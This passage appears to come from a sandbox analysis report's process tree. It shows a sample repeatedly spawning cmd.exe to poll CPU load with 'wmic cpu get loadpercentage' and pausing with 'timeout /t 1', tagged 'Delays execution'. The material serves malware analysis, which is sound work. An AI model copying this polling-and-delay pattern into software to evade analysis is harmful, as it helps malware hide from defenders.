  2⤵
  PID:900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4652
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4540
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:984
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3268
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4000
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4532
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4500
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2856
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2960
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5028
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4836
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4372
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4464
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2844
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:904
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4252
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5052
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2140
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4468
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2896
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1676
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3272
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5008
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5020
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5048
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4568
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3984
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:508
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:768
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4300
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2420
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4348
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5012
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4156
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4524
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1472
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4264
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3300
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3744
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1824
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:900
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2316
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4184
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3924
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4376
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2524
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4244
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1368
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3148
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2412
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4292
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4660
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:588
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:644
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:496
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3480
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4928
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1772
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4920
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4120
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:340
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3652
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2752
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3600
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4600
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:832
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4428
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1976
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4892
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2944
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1020
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:60
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2480
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:336
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2420
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4596
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4188
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4156
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3972
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:408
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1288
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2688
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1980
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2148
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2912
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3968
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:764
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2524
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:296
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1972
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2152
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4880
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2516
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3796
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:644
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4080
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4384
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2440
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3480
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1924
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4920
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2408
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:340
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1168
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3284
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4828
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3652
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2832
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3320
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3764
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3836
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:712
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4560
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1512
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1020
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3984
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4992
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2480
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1508
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2224
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1432
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4528
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2096
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:616
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4932
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:736
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5000
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4540
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4180
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2912
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3268
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3936
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4144
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4244
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4440
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4200
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2396
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:640
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1496
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4048
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2628
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:664
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4592
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4928
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4116
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5068
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2360
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3980
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5024
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3652
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5044
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3764
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5008
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5020
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4584
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5096
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2944
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:336
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2920
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4140
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4300
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2420
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:884
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2416
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2992
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1808
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2932
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1704
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4528
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4136
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3520
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3508
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4156
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1472
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1824
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2840
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2868
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4556
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4652
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4664
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4872
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1464
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4436
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2356
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3232
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4408
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1644
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2700
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4372
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4080
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2040
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3076
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1532
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4928
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4252
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1772
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4748
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1168
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2360
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2832
- C:\Windows\system32\cmd.exe
